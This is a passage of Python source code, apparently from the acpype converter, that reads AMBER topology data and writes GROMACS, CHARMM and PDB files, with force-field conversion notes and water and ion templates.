Applying this here." % atomName) atomName = atomName.upper() atomTypeName = atomTypeNameList[id_] if id_ + 1 == resIds[countRes]: resid = countRes # self.residueLabel[countRes] countRes += 1 resName = self.residueLabel[resid] if resName in ionOrSolResNameList and not FirstNonSoluteId: FirstNonSoluteId = id_ # print id_, resid, resName mass = massList[id_] # charge = balanceChargeList[id_] charge = chargeList[id_] chargeConverted = charge / qConv totalCharge += charge coord = coords[id_] ACOEF = ACOEFs[id_] BCOEF = BCOEFs[id_] atomType = AtomType(atomTypeName, mass, ACOEF, BCOEF) if atomTypeName not in tmpList: tmpList.append(atomTypeName) atomTypes.append(atomType) atom = Atom(atomName, atomType, id_ + 1, resid, mass, chargeConverted, coord) atoms.append(atom) id_ += 1 balanceChargeList, balanceValue, balanceIds = self.balanceCharges(chargeList, FirstNonSoluteId) for id_ in balanceIds: atoms[id_].charge = balanceValue / qConv # self.printDebug("atom ids and balanced charges: %s, %3f10" % (balanceIds, balanceValue/qConv)) if atomTypeName[0].islower(): self.atomTypeSystem = "gaff" else: self.atomTypeSystem = "amber" self.printDebug("Balanced TotalCharge %13.10f" % float(sum(balanceChargeList) / qConv)) self.totalCharge = int(totalCharge) self.atoms = atoms self.atomTypes = atomTypes self.pbc = None if len(coords) == len(atoms) + 2 or len(coords) == len(atoms) * 2 + 2: self.pbc = [coords[-2], coords[-1]] self.printDebug("PBC = %s" % self.pbc) self.printDebug("getAtoms done") def getBonds(self): """Get Bonds""" uniqKbList = self.getFlagData("BOND_FORCE_CONSTANT") uniqReqList = self.getFlagData("BOND_EQUIL_VALUE") bondCodeHList = self.getFlagData("BONDS_INC_HYDROGEN") bondCodeNonHList = self.getFlagData("BONDS_WITHOUT_HYDROGEN") bondCodeList = bondCodeHList + bondCodeNonHList bonds = [] for i in range(0, len(bondCodeList), 3): idAtom1 = bondCodeList[i] // 3 # remember python starts with id 0 idAtom2 = bondCodeList[i + 1] // 3 bondTypeId = bondCodeList[i + 2] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] kb = uniqKbList[bondTypeId] req = uniqReqList[bondTypeId] atoms = [atom1, atom2] bond = Bond(atoms, kb, req) bonds.append(bond) self.bonds = bonds self.printDebug("getBonds done") def getAngles(self): """Get Angles""" uniqKtList = self.getFlagData("ANGLE_FORCE_CONSTANT") uniqTeqList = self.getFlagData("ANGLE_EQUIL_VALUE") # for list below, true atom number = index/3 + 1 angleCodeHList = self.getFlagData("ANGLES_INC_HYDROGEN") angleCodeNonHList = self.getFlagData("ANGLES_WITHOUT_HYDROGEN") angleCodeList = angleCodeHList + angleCodeNonHList angles = [] for i in range(0, len(angleCodeList), 4): idAtom1 = angleCodeList[i] // 3 # remember python starts with id 0 idAtom2 = angleCodeList[i + 1] // 3 idAtom3 = angleCodeList[i + 2] // 3 angleTypeId = angleCodeList[i + 3] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] atom3 = self.atoms[idAtom3] kt = uniqKtList[angleTypeId] teq = uniqTeqList[angleTypeId] # angle given in rad in prmtop atoms = [atom1, atom2, atom3] angle = Angle(atoms, kt, teq) angles.append(angle) self.angles = angles self.printDebug("getAngles done") def getDihedrals(self): """ Get dihedrals (proper and imp), condensed list of prop dih and atomPairs """ uniqKpList = self.getFlagData("DIHEDRAL_FORCE_CONSTANT") uniqPeriodList = self.getFlagData("DIHEDRAL_PERIODICITY") uniqPhaseList = self.getFlagData("DIHEDRAL_PHASE") # for list below, true atom number = abs(index)/3 + 1 dihCodeHList = self.getFlagData("DIHEDRALS_INC_HYDROGEN") dihCodeNonHList = self.getFlagData("DIHEDRALS_WITHOUT_HYDROGEN") dihCodeList = dihCodeHList + dihCodeNonHList properDih = [] improperDih = [] condProperDih = [] # list of dihedrals condensed by the same quartet # atomPairs = [] atomPairs = set() for i in range(0, len(dihCodeList), 5): idAtom1 = dihCodeList[i] // 3 # remember python starts with id 0 idAtom2 = dihCodeList[i + 1] // 3 # 3 and 4 indexes can be negative: if id3 < 0, end group interations # in amber are to be ignored; if id4 < 0, dihedral is improper idAtom3raw = dihCodeList[i + 2] // 3 # can be negative -> exclude from 1-4vdw idAtom4raw = dihCodeList[i + 3] // 3 # can be negative -> Improper idAtom3 = abs(idAtom3raw) idAtom4 = abs(idAtom4raw) dihTypeId = dihCodeList[i + 4] - 1 atom1 = self.atoms[idAtom1] atom2 = self.atoms[idAtom2] atom3 = self.atoms[idAtom3] atom4 = self.atoms[idAtom4] kPhi = uniqKpList[dihTypeId] # already divided by IDIVF period = int(uniqPeriodList[dihTypeId]) # integer phase = uniqPhaseList[dihTypeId] # angle given in rad in prmtop if phase == kPhi == 0: period = 0 # period is set to 0 atoms = [atom1, atom2, atom3, atom4] dihedral = Dihedral(atoms, kPhi, period, phase) if idAtom4raw > 0: try: atomsPrev = properDih[-1].atoms except Exception: atomsPrev = [] properDih.append(dihedral) if idAtom3raw < 0 and atomsPrev == atoms: condProperDih[-1].append(dihedral) else: condProperDih.append([dihedral]) pair = (atom1, atom4) # if atomPairs.count(pair) == 0 and idAtom3raw > 0: if idAtom3raw > 0: atomPairs.add(pair) else: improperDih.append(dihedral) try: atomPairs = sorted(atomPairs) except Exception: pass self.properDihedrals = properDih self.improperDihedrals = improperDih self.condensedProperDihedrals = condProperDih # [[],[],...] self.atomPairs = atomPairs # set((atom1, atom2), ...) self.printDebug("getDihedrals done") def getChirals(self): """ Get chiral atoms, its 4 neighbours and improper dihedral angle """ self.chiralGroups = [] if self.obchiralExe: # print (self.obchiralExe, os.getcwd()) cmd = "%s %s" % (self.obchiralExe, self.inputFile) # print(cmd) out = map(int, re.findall(r"Atom (\d+) Is", _getoutput(cmd))) # print("*%s*" % out) chiralGroups = [] for id_ in out: atChi = self.atoms[id_ - 1] quad = [] for bb in self.bonds: bAts = bb.atoms[:] if atChi in bAts: bAts.remove(atChi) quad.append(bAts[0]) if len(quad) != 4: if self.chiral: self.printWarn( "Atom %s has less than 4 connections to 4 different atoms. It's NOT Chiral!" % atChi ) continue v1, v2, v3, v4 = [x.coords for x in quad] chiralGroups.append((atChi, quad, imprDihAngle(v1, v2, v3, v4))) self.chiralGroups = chiralGroups def sortAtomsForGromacs(self): """ Re-sort atoms for gromacs, which expects all hydrogens to immediately follow the heavy atom they are bonded to and belong to the same charge group. Currently, atom mass < 1.2 is taken to denote a proton. This behavior may be changed by modifying the 'is_hydrogen' function within. JDC 2011-02-03 """ # Build dictionary of bonded atoms. bonded_atoms = dict() for atom in self.atoms: bonded_atoms[atom] = list() for bond in self.bonds: [atom1, atom2] = bond.atoms bonded_atoms[atom1].append(atom2) bonded_atoms[atom2].append(atom1) # Define hydrogen and heavy atom classes. def is_hydrogen(atom): """Check for H""" return atom.mass < 1.2 def is_heavy(atom): """Check for non H""" return not is_hydrogen(atom) # Build list of sorted atoms, assigning charge groups by heavy atom. sorted_atoms = list() cgnr = 1 # charge group number: each heavy atoms is assigned its own charge group # First pass: add heavy atoms, followed by the hydrogens bonded to them. for atom in self.atoms: if is_heavy(atom): # Append heavy atom. atom.cgnr = cgnr sorted_atoms.append(atom) # Append all hydrogens. for bonded_atom in bonded_atoms[atom]: if is_hydrogen(bonded_atom) and bonded_atom not in sorted_atoms: # Append bonded hydrogen. bonded_atom.cgnr = cgnr sorted_atoms.append(bonded_atom) cgnr += 1 # Second pass: Add any remaining atoms. if len(sorted_atoms) < len(self.atoms): for atom in self.atoms: if atom not in sorted_atoms: atom.cgnr = cgnr sorted_atoms.append(atom) cgnr += 1 # Replace current list of atoms with sorted list. self.atoms = sorted_atoms # Renumber atoms in sorted list, starting from 1. for (index, atom) in enumerate(self.atoms): atom.id = index + 1 def setAtomPairs(self): """ Set a list of pair of atoms pertinent to interaction 1-4 for vdw. WRONG: Deprecated """ atomPairs = [] for item in self.condensedProperDihedrals: dih = item[0] atom1 = dih.atoms[0] atom2 = dih.atoms[3] pair = [atom1, atom2] if atomPairs.count(pair) == 0: atomPairs.append(pair) self.atomPairs = atomPairs # [[atom1, atom2], ...] self.printDebug("atomPairs done") def getExcludedAtoms(self): """ Returns a list of atoms with a list of its excluded atoms up to 3rd neighbour. It's implicitly indexed, i.e., a sequence of atoms in position n in the excludedAtomsList corresponds to atom n (self.atoms) and so on. NOT USED """ excludedAtomsIdList = self.getFlagData("EXCLUDED_ATOMS_LIST") numberExcludedAtoms = self.getFlagData("NUMBER_EXCLUDED_ATOMS") atoms = self.atoms interval = 0 excludedAtomsList = [] for number in numberExcludedAtoms: temp = excludedAtomsIdList[interval : interval + number] if temp == [0]: excludedAtomsList.append([]) else: excludedAtomsList.append([atoms[a - 1] for a in temp]) interval += number self.excludedAtoms = excludedAtomsList self.printDebug("getExcludedAtoms") def balanceCharges(self, chargeList, FirstNonSoluteId=None): """ Note that python is very annoying about floating points. Even after balance, there will always be some residue of order e-12 to e-16, which is believed to vanished once one writes a topology file, say, for CNS or GMX, where floats are represented with 4 or 5 maximum decimals. """ limIds = [] # self.printDebug(chargeList) total = sum(chargeList) totalConverted = total / qConv self.printDebug("charge to be balanced: total %13.10f" % (totalConverted)) maxVal = max(chargeList[:FirstNonSoluteId]) minVal = min(chargeList[:FirstNonSoluteId]) if abs(maxVal) >= abs(minVal): lim = maxVal else: lim = minVal nLims = chargeList.count(lim) # limId = chargeList.index(lim) diff = totalConverted - round(totalConverted) fix = lim - diff * qConv / nLims id_ = 0 for c in chargeList: if c == lim: limIds.append(id_) chargeList[id_] = fix id_ += 1 # self.printDebug(chargeList) self.printDebug("balanceCharges done") return chargeList, fix, limIds def getABCOEFs(self): """Get non-bonded coeficients""" uniqAtomTypeIdList = self.getFlagData("ATOM_TYPE_INDEX") nonBonIdList = self.getFlagData("NONBONDED_PARM_INDEX") rawACOEFs = self.getFlagData("LENNARD_JONES_ACOEF") rawBCOEFs = self.getFlagData("LENNARD_JONES_BCOEF") # print nonBonIdList, len(nonBonIdList), rawACOEFs, len(rawACOEFs) ACOEFs = [] BCOEFs = [] ntypes = max(uniqAtomTypeIdList) # id_ = 0 # for atName in self._atomTypeNameList: for id_ in range(len(self._atomTypeNameList)): # id_ = self._atomTypeNameList.index(atName) atomTypeId = uniqAtomTypeIdList[id_] index = ntypes * (atomTypeId - 1) + atomTypeId nonBondId = nonBonIdList[index - 1] # print "*****", index, ntypes, atName, id_, atomTypeId, nonBondId ACOEFs.append(rawACOEFs[nonBondId - 1]) BCOEFs.append(rawBCOEFs[nonBondId - 1]) # id_ += 1 # print ACOEFs self.printDebug("getABCOEFs done") return ACOEFs, BCOEFs def setProperDihedralsCoef(self): """ It takes self.condensedProperDihedrals and returns self.properDihedralsCoefRB, a reduced list of quartet atoms + RB. Coeficients ready for GMX (multiplied by 4.184) self.properDihedralsCoefRB = [ [atom1,..., atom4], C[0:5] ] For proper dihedrals: a quartet of atoms may appear with more than one set of parameters and to convert to GMX they are treated as RBs. The resulting coefs calculated here may look slighted different from the ones calculated by amb2gmx.pl because python is taken full float number from prmtop and not rounded numbers from rdparm.out as amb2gmx.pl does. """ properDihedralsCoefRB = [] properDihedralsAlphaGamma = [] properDihedralsGmx45 = [] for item in self.condensedProperDihedrals: V = 6 * [0.0] C = 6 * [0.0] for dih in item: period = dih.period # Pn kPhi = dih.kPhi # in rad phaseRaw = dih.phase * radPi # in degree phase = int(phaseRaw) # in degree if period > 4 and self.gmx4: self.printError("Likely trying to convert ILDN to RB, DO NOT use option '-z'") sys.exit(13) if phase in [0, 180]: properDihedralsGmx45.append([item[0].atoms, phaseRaw, kPhi, period]) if self.gmx4: if kPhi != 0: V[period] = 2 * kPhi * cal if period == 1: C[0] += 0.5 * V[period] if phase == 0: C[1] -= 0.5 * V[period] else: C[1] += 0.5 * V[period] elif period == 2: if phase == 180: C[0] += V[period] C[2] -= V[period] else: C[2] += V[period] elif period == 3: C[0] += 0.5 * V[period] if phase == 0: C[1] += 1.5 * V[period] C[3] -= 2 * V[period] else: C[1] -= 1.5 * V[period] C[3] += 2 * V[period] elif period == 4: if phase == 180: C[2] += 4 * V[period] C[4] -= 4 * V[period] else: C[0] += V[period] C[2] -= 4 * V[period] C[4] += 4 * V[period] else: properDihedralsAlphaGamma.append([item[0].atoms, phaseRaw, kPhi, period]) # print phaseRaw, kPhi, period if phase in [0, 180]: properDihedralsCoefRB.append([item[0].atoms, C]) # print properDihedralsCoefRB # print properDihedralsAlphaGamma self.printDebug("setProperDihedralsCoef done") self.properDihedralsCoefRB = properDihedralsCoefRB self.properDihedralsAlphaGamma = properDihedralsAlphaGamma self.properDihedralsGmx45 = properDihedralsGmx45 def writeCharmmTopolFiles(self): """Write CHARMM topology files""" self.printMess("Writing CHARMM files\n") # self.makeDir() at = self.atomType self.getResidueLabel() res = self.resName # self.residueLabel[0] # print res, self.residueLabel, type(self.residueLabel) cmd = ( "%s -dr no -i %s -fi mol2 -o %s -fo charmm -s 2 -at %s \ -pf y -rn %s" % (self.acExe, self.acMol2FileName, self.charmmBase, at, res) ) if self.debug: cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) log = _getoutput(cmd) if self.debug: self.printQuoted(log) def writePdb(self, file_): """ Write a new PDB file_ with the atom names defined by Antechamber Input: file_ path string The format generated here use is slightly different from http://www.wwpdb.org/documentation/format23/sect9.html respected to atom name """ # TODO: assuming only one residue ('1') pdbFile = open(file_, "w") fbase = os.path.basename(file_) pdbFile.write("REMARK " + head % (fbase, date)) id_ = 1 for atom in self.atoms: # id_ = self.atoms.index(atom) + 1 aName = atom.atomName if len(aName) == 2: aName = " %s " % aName elif len(aName) == 1: aName = " %s " % aName for ll in aName: if ll.isalpha(): s = ll break rName = self.residueLabel[0] x = atom.coords[0] y = atom.coords[1] z = atom.coords[2] line = "%-6s%5d %4s %3s Z%4d%s%8.3f%8.3f%8.3f%6.2f%6.2f%s%2s\n" % ( "ATOM", id_, aName, rName, 1, 4 * " ", x, y, z, 1.0, 0.0, 10 * " ", s, ) pdbFile.write(line) id_ += 1 pdbFile.write("END\n") def writeGromacsTopolFiles(self, amb2gmx=False): """ # from ~/Programmes/amber10/dat/leap/parm/gaff.dat #atom type atomic mass atomic polarizability comments ca 12.01 0.360 Sp2 C in pure aromatic systems ha 1.008 0.135 H bonded to aromatic carbon #bonded atoms harmonic force kcal/mol/A^2 eq. dist. Ang. comments ca-ha 344.3* 1.087** SOURCE3 1496 0.0024 0.0045 * for gmx: 344.3 * 4.184 * 100 * 2 = 288110 kJ/mol/nm^2 (why factor 2?) ** convert Ang to nm ( div by 10) for gmx: 1.087 A = 0.1087 nm # CA HA 1 0.10800 307105.6 ; ged from 340. bsd on C6H6 nmodes; PHE,TRP,TYR (from ffamber99bon.itp) # CA-HA 367.0 1.080 changed from 340. bsd on C6H6 nmodes; PHE,TRP,TYR (from parm99.dat) # angle HF kcal/mol/rad^2 eq angle degrees comments ca-ca-ha 48.5* 120.01 SOURCE3 2980 0.1509 0.2511 * to convert to gmx: 48.5 * 4.184 * 2 = 405.848 kJ/mol/rad^2 (why factor 2?) # CA CA HA 1 120.000 418.400 ; new99 (from ffamber99bon.itp) # CA-CA-HA 50.0 120.00 (from parm99.dat) # dihedral idivf barrier hight/2 kcal/mol phase degrees periodicity comments X -ca-ca-X 4 14.500* 180.000 2.000 intrpol.bsd.on C6H6 *convert 2 gmx: 14.5/4 * 4.184 * 2 (?) (yes in amb2gmx, not in topolbuild, why?) = 30.334 or 15.167 kJ/mol # X -CA-CA-X 4 14.50 180.0 2. intrpol.bsd.on C6H6 (from parm99.dat) # X CA CA X 3 30.334 0.000 -30.33400 0.000 0.000 0.000 ; intrpol.bsd.on C6H6 ;propers treated as RBs in GMX to use combine multiple AMBER torsions per quartet (from ffamber99bon.itp) # impr. dihedral barrier hight/2 phase degrees periodicity comments X -X -ca-ha 1.1* 180. 2. bsd.on C6H6 nmodes * to convert to gmx: 1.1 * 4.184 = 4.6024 kJ/mol/rad^2 # X -X -CA-HA 1.1 180. 2. bsd.on C6H6 nmodes (from parm99.dat) # X X CA HA 1 180.00 4.60240 2 ; bsd.on C6H6 nmodes ;impropers treated as propers in GROMACS to use correct AMBER analytical function (from ffamber99bon.itp) # 6-12 parms sigma = 2 * r * 2^(-1/6) epsilon # atomtype radius Ang. pot. well depth kcal/mol comments ha 1.4590* 0.0150** Spellmeyer ca 1.9080 0.0860 OPLS * to convert to gmx: sigma = 1.4590 * 2^(-1/6) * 2 = 2 * 1.29982 Ang. = 2 * 0.129982 nm = 1.4590 * 2^(5/6)/10 = 0.259964 nm ** to convert to gmx: 0.0150 * 4.184 = 0.06276 kJ/mol # amber99_3 CA 0.0000 0.0000 A 3.39967e-01 3.59824e-01 (from ffamber99nb.itp) # amber99_22 HA 0.0000 0.0000 A 2.59964e-01 6.27600e-02 (from ffamber99nb.itp) # C* 1.9080 0.0860 Spellmeyer # HA 1.4590 0.0150 Spellmeyer (from parm99.dat) # to convert r and epsilon to ACOEF and BCOEF # ACOEF = sqrt(e1*e2) * (r1 + r2)^12 ; BCOEF = 2 * sqrt(e1*e2) * (r1 + r2)^6 = 2 * ACOEF/(r1+r2)^6 # to convert ACOEF and BCOEF to r and epsilon # r = 0.5 * (2*ACOEF/BCOEF)^(1/6); ep = BCOEF^2/(4*ACOEF) # to convert ACOEF and BCOEF to sigma and epsilon (GMX) # sigma = (ACOEF/BCOEF)^(1/6) * 0.1 ; epsilon = 4.184 * BCOEF^2/(4*ACOEF) # ca ca 819971.66 531.10 # ca ha 76245.15 104.66 # ha ha 5716.30 18.52 For proper dihedrals: a quartet of atoms may appear with more than one set of parameters and to convert to GMX they are treated as RBs; use the algorithm: for(my $j=$i;$j<=$lines;$j++){ my $period = $pn{$j}; if($pk{$j}>0) { $V[$period] = 2*$pk{$j}*$cal; } # assign V values to C values as predefined # if($period==1){ $C[0]+=0.5*$V[$period]; if($phase{$j}==0){ $C[1]-=0.5*$V[$period]; }else{ $C[1]+=0.5*$V[$period]; } }elsif($period==2){ if(($phase{$j}==180)||($phase{$j}==3.14)){ $C[0]+=$V[$period]; $C[2]-=$V[$period]; }else{ $C[2]+=$V[$period]; } }elsif($period==3){ $C[0]+=0.5*$V[$period]; if($phase{$j}==0){ $C[1]+=1.5*$V[$period]; $C[3]-=2*$V[$period]; }else{ $C[1]-=1.5*$V[$period]; $C[3]+=2*$V[$period]; } }elsif($period==4){ if(($phase{$j}==180)||($phase{$j}==3.14)){ $C[2]+=4*$V[$period]; $C[4]-=4*$V[$period]; }else{ $C[0]+=$V[$period]; $C[2]-=4*$V[$period]; $C[4]+=4*$V[$period]; } } } """ self.printMess("Writing GROMACS files\n") self.setAtomType4Gromacs() self.writeGroFile() self.writeGromacsTop(amb2gmx=amb2gmx) self.writeMdpFiles() def setAtomType4Gromacs(self): """Atom types names in Gromacs TOP file are not case sensitive; this routine will append a '_' to lower case atom type. E.g.: CA and ca -> CA and ca_ """ if self.disam: self.printMess("Disambiguating lower and uppercase atomtypes in GMX top file.\n") self.atomTypesGromacs = self.atomTypes self.atomsGromacs = self.atoms return atNames = [at.atomTypeName for at in self.atomTypes] # print atNames delAtomTypes = [] modAtomTypes = [] atomTypesGromacs = [] dictAtomTypes = {} for at in self.atomTypes: atName = at.atomTypeName dictAtomTypes[atName] = at if atName.islower() and atName.upper() in atNames: # print atName, atName.upper() atUpper = self.atomTypes[atNames.index(atName.upper())] # print at.atomTypeName,at.mass, at.ACOEF, at.BCOEF # print atUpper.atomTypeName, atUpper.mass, atUpper.ACOEF, atUpper.BCOEF if at.ACOEF is atUpper.ACOEF and at.BCOEF is at.BCOEF: delAtomTypes.append(atName) else: newAtName = atName + "_" modAtomTypes.append(atName) atomType = AtomType(newAtName, at.mass, at.ACOEF, at.BCOEF) atomTypesGromacs.append(atomType) dictAtomTypes[newAtName] = atomType else: atomTypesGromacs.append(at) atomsGromacs = [] for a in self.atoms: atName = a.atomType.atomTypeName if atName in delAtomTypes: atom = Atom(a.atomName, dictAtomTypes[atName.upper()], a.id, a.resid, a.mass, a.charge, a.coords) atom.cgnr = a.cgnr atomsGromacs.append(atom) elif atName in modAtomTypes: atom = Atom(a.atomName, dictAtomTypes[atName + "_"], a.id, a.resid, a.mass, a.charge, a.coords) atom.cgnr = a.cgnr atomsGromacs.append(atom) else: atomsGromacs.append(a) self.atomTypesGromacs = atomTypesGromacs self.atomsGromacs = atomsGromacs # print [i.atomTypeName for i in atomTypesGromacs] # print modAtomTypes # print delAtomTypes def writeGromacsTop(self, amb2gmx=False): """Write GMX topology file""" if self.atomTypeSystem == "amber": d2opls = dictAtomTypeAmb2OplsGmxCode else: d2opls = dictAtomTypeGaff2OplsGmxCode topText = [] itpText = [] oitpText = [] otopText = [] top = self.baseName + "_GMX.top" itp = self.baseName + "_GMX.itp" otop = self.baseName + "_GMX_OPLS.top" oitp = self.baseName + "_GMX_OPLS.itp" headDefault = """ [ defaults ] ; nbfunc comb-rule gen-pairs fudgeLJ fudgeQQ 1 2 yes 0.5 0.8333 """ headItp = """ ; Include %s topology #include "%s" """ headOpls = """ ; Include forcefield parameters #include "ffoplsaa.itp" """ headSystem = """ [ system ] %s """ headMols = """ [ molecules ] ; Compound nmols """ headAtomtypes = """ [ atomtypes ] ;name bond_type mass charge ptype sigma epsilon Amb """ headAtomtypesOpls = """ ; For OPLS atomtypes manual fine tuning ; AC_at:OPLS_at:OPLScode: Possible_Aternatives (see ffoplsaa.atp and ffoplsaanb.itp) """ headMoleculetype = """ [ moleculetype ] ;name nrexcl %-16s 3 """ headAtoms = """ [ atoms ] ; nr type resi res atom cgnr charge mass ; qtot bond_type """ headBonds = """ [ bonds ] ; ai aj funct r k """ headPairs = """ [ pairs ] ; ai aj funct """ headAngles = """ [ angles ] ; ai aj ak funct theta cth """ headProDih = """ [ dihedrals ] ; propers ; treated as RBs in GROMACS to use combine multiple AMBER torsions per quartet ; i j k l func C0 C1 C2 C3 C4 C5 """ headProDihAlphaGamma = """; treated as usual propers in GROMACS since Phase angle diff from 0 or 180 degrees ; i j k l func phase kd pn """ headProDihGmx45 = """ [ dihedrals ] ; propers ; for gromacs 4.5 or higher, using funct 9 ; i j k l func phase kd pn """ headImpDih = """ [ dihedrals ] ; impropers ; treated as propers in GROMACS to use correct AMBER analytical function ; i j k l func phase kd pn """ # NOTE: headTopWaterTip3p and headTopWaterSpce actually do NOTHING # ============================================================================================================== # _headTopWaterTip3p = """ # [ bondtypes ] # ; i j func b0 kb # OW HW 1 0.09572 462750.4 ; TIP3P water # HW HW 1 0.15139 462750.4 ; TIP3P water # # [ angletypes ] # ; i j k func th0 cth # HW OW HW 1 104.520 836.800 ; TIP3P water # HW HW OW 1 127.740 0.000 ; (found in crystallographic water with 3 bonds) # """ # # _headTopWaterSpce = """ # [ bondtypes ] # ; i j func b0 kb # OW HW 1 0.1 462750.4 ; SPCE water # HW HW 1 0.1633 462750.4 ; SPCE water # # [ angletypes ] # ; i j k func th0 cth # HW OW HW 1 109.47 836.800 ; SPCE water # HW HW OW 1 125.265 0.000 ; SPCE water # """ # ============================================================================================================== headNa = f""" [ moleculetype ] ; molname nrexcl NA+ 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 NA+ NA+ 1 1 22.9898 """ headCl = """ [ moleculetype ] ; molname nrexcl CL- 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 CL- CL- 1 -1 35.45300 """ headK = """ [ moleculetype ] ; molname nrexcl K+ 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 K+ K+ 1 1 39.100 """ headWaterTip3p = """ [ moleculetype ] ; molname nrexcl ; TIP3P model WAT 2 [ atoms ] ; nr type resnr residue atom cgnr charge mass 1 OW 1 WAT O 1 -0.834 16.00000 2 HW 1 WAT H1 1 0.417 1.00800 3 HW 1 WAT H2 1 0.417 1.00800 #ifdef FLEXIBLE [ bonds ] ; i j funct length force.c. 1 2 1 0.09572 462750.4 0.09572 462750.4 1 3 1 0.09572 462750.4 0.09572 462750.4 [ angles ] ; i j k funct angle force.c. 2 1 3 1 104.520 836.800 104.520 836.800 #else [ settles ] ; i j funct length 1 1 0.09572 0.15139 [ exclusions ] 1 2 3 2 1 3 3 1 2 #endif """ headWaterSpce = """ [ moleculetype ] ; molname nrexcl ; SPCE model WAT 2 [ atoms ] ; nr type resnr residue atom cgnr charge mass 1 OW 1 WAT O 1 -0.8476 15.99940 2 HW 1 WAT H1 1 0.4238 1.00800 3 HW 1 WAT H2 1 0.4238 1.00800 #ifdef FLEXIBLE [ bonds ] ; i j funct length force.c. 1 2 1 0.1 462750.4 0.1 462750.4 1 3 1 0.1 462750.4 0.1 462750.4 [ angles ] ; i j k funct angle force.c. 2 1 3 1 109.47 836.800 109.47 836.800 #else [ settles ] ; OW funct doh dhh 1 1 0.1 0.16330 [ exclusions ] 1 2 3 2 1 3 3 1 2 #endif """ if self.direct and amb2gmx: self.printMess("Converting directly from AMBER to GROMACS.\n") # Dict of ions dealt by acpype emulating amb2gmx ionsDict = {"Na+": headNa, "Cl-": headCl, "K+": headK} ionsSorted = [] # NOTE: headWaterTip3p and headWaterSpce actually do the real thing # so, skipping headTopWaterTip3p and headWaterTip3p # headTopWater = headTopWaterTip3p headWater = headWaterTip3p nWat = 0 # topFile.write("; " + head % (top, date)) topText.append("; " + head % (top, date)) otopText.append("; " + head % (otop, date)) # topFile.write(headDefault) topText.append(headDefault) nSolute = 0 if not amb2gmx: topText.append(headItp % (itp, itp)) otopText.append(headOpls) otopText.append(headItp % (itp, itp)) itpText.append("; " + head % (itp, date)) oitpText.append("; " + head % (oitp, date)) self.printDebug("atomTypes %i" % len(self.atomTypesGromacs)) temp = [] otemp = [] for aType in self.atomTypesGromacs: aTypeName = aType.atomTypeName oaCode = d2opls.get(aTypeName, ["x", "0"])[:-1] aTypeNameOpls = oplsCode2AtomTypeDict.get(oaCode[0], "x") A = aType.ACOEF B = aType.BCOEF # one cannot infer sigma or epsilon for B = 0, assuming 0 for them if B == 0.0: sigma, epsilon, r0, epAmber = 0, 0, 0, 0 else: r0 = 0.5 * math.pow((2 * A / B), (1.0 / 6)) epAmber = 0.25 * B * B / A sigma = 0.1 * math.pow((A / B), (1.0 / 6)) epsilon = cal * epAmber if aTypeName == "OW": if A == 629362.166 and B == 625.267765: # headTopWater = headTopWaterSpce headWater = headWaterSpce # OW 629362.166 625.267765 spce # OW 581935.564 594.825035 tip3p # print aTypeName, A, B line = " %-8s %-11s %3.5f %3.5f A %13.5e %13.5e" % ( aTypeName, aTypeName, 0.0, 0.0, sigma, epsilon, ) + " ; %4.2f %1.4f\n" % (r0, epAmber) oline = "; %s:%s:opls_%s: %s\n" % (aTypeName, aTypeNameOpls, oaCode[0], repr(oaCode[1:])) # tmpFile.write(line) temp.append(line) otemp.append(oline) if amb2gmx: topText.append(headAtomtypes) topText += temp nWat = self.residueLabel.count("WAT") for ion in ionsDict: nIon = self.residueLabel.count(ion) if nIon > 0: idIon = self.residueLabel.index(ion) ionType = self.search(name=ion).atomType.atomTypeName ionsSorted.append((idIon, nIon, ion, ionType)) ionsSorted.sort() else: itpText.append(headAtomtypes) itpText += temp oitpText.append(headAtomtypesOpls) oitpText += otemp self.printDebug("GMX atomtypes done") if len(self.atoms) > 3 * nWat + sum([x[1] for x in ionsSorted]): nSolute = 1 if nWat: # topText.append(headTopWater) self.printDebug("type of water '%s'" % headWater[43:48].strip()) if nSolute: if amb2gmx: topText.append(headMoleculetype % self.baseName) else: itpText.append(headMoleculetype % self.baseName) oitpText.append(headMoleculetype % self.baseName) self.printDebug("atoms %i" % len(self.atoms)) qtot = 0.0 count = 1 temp = [] otemp = [] id2oplsATDict = {} for atom in self.atomsGromacs: resid = atom.resid resname = self.residueLabel[resid] if not self.direct: if resname in list(ionsDict) + ["WAT"]: break aName = atom.atomName aType = atom.atomType.atomTypeName oItem = d2opls.get(aType, ["x", 0]) oplsAtName = oplsCode2AtomTypeDict.get(oItem[0], "x") id_ = atom.id id2oplsATDict[id_] = oplsAtName oaCode = "opls_" + oItem[0] cgnr = id_ if self.sorted: cgnr = atom.cgnr # JDC charge = atom.charge mass = atom.mass omass = float(oItem[-1]) qtot += charge resnr = resid + 1 line = "%6d %4s %5d %5s %5s %4d %12.6f %12.5f ; qtot %1.3f\n" % ( id_, aType, resnr, resname, aName, cgnr, charge, mass, qtot, ) # JDC oline = "%6d %4s %5d %5s %5s %4d %12.6f %12.5f ; qtot % 3.3f %-4s\n" % ( id_, oaCode, resnr, resname, aName, cgnr, charge, omass, qtot, oplsAtName, ) # JDC count += 1 temp.append(line) otemp.append(oline) if temp: if amb2gmx: topText.append(headAtoms) topText += temp else: itpText.append(headAtoms) itpText += temp oitpText.append(headAtoms) oitpText += otemp self.printDebug("GMX atoms done") # remove bond of water self.printDebug("bonds %i" % len(self.bonds)) temp = [] otemp = [] for bond in self.bonds: res1 = self.residueLabel[bond.atoms[0].resid] res2 = self.residueLabel[bond.atoms[0].resid] if "WAT" in [res1, res2]: continue a1Name = bond.atoms[0].atomName a2Name = bond.atoms[1].atomName id1 = bond.atoms[0].id id2 = bond.atoms[1].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) line = "%6i %6i %3i %13.4e %13.4e ; %6s - %-6s\n" % ( id1, id2, 1, bond.rEq * 0.1, bond.kBond * 200 * cal, a1Name, a2Name, ) oline = "%6i %6i %3i ; %13.4e %13.4e ; %6s - %-6s %6s - %-6s\n" % ( id1, id2, 1, bond.rEq * 0.1, bond.kBond * 200 * cal, a1Name, a2Name, oat1, oat2, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headBonds) topText += temp else: itpText.append(headBonds) itpText += temp oitpText.append(headBonds) oitpText += otemp 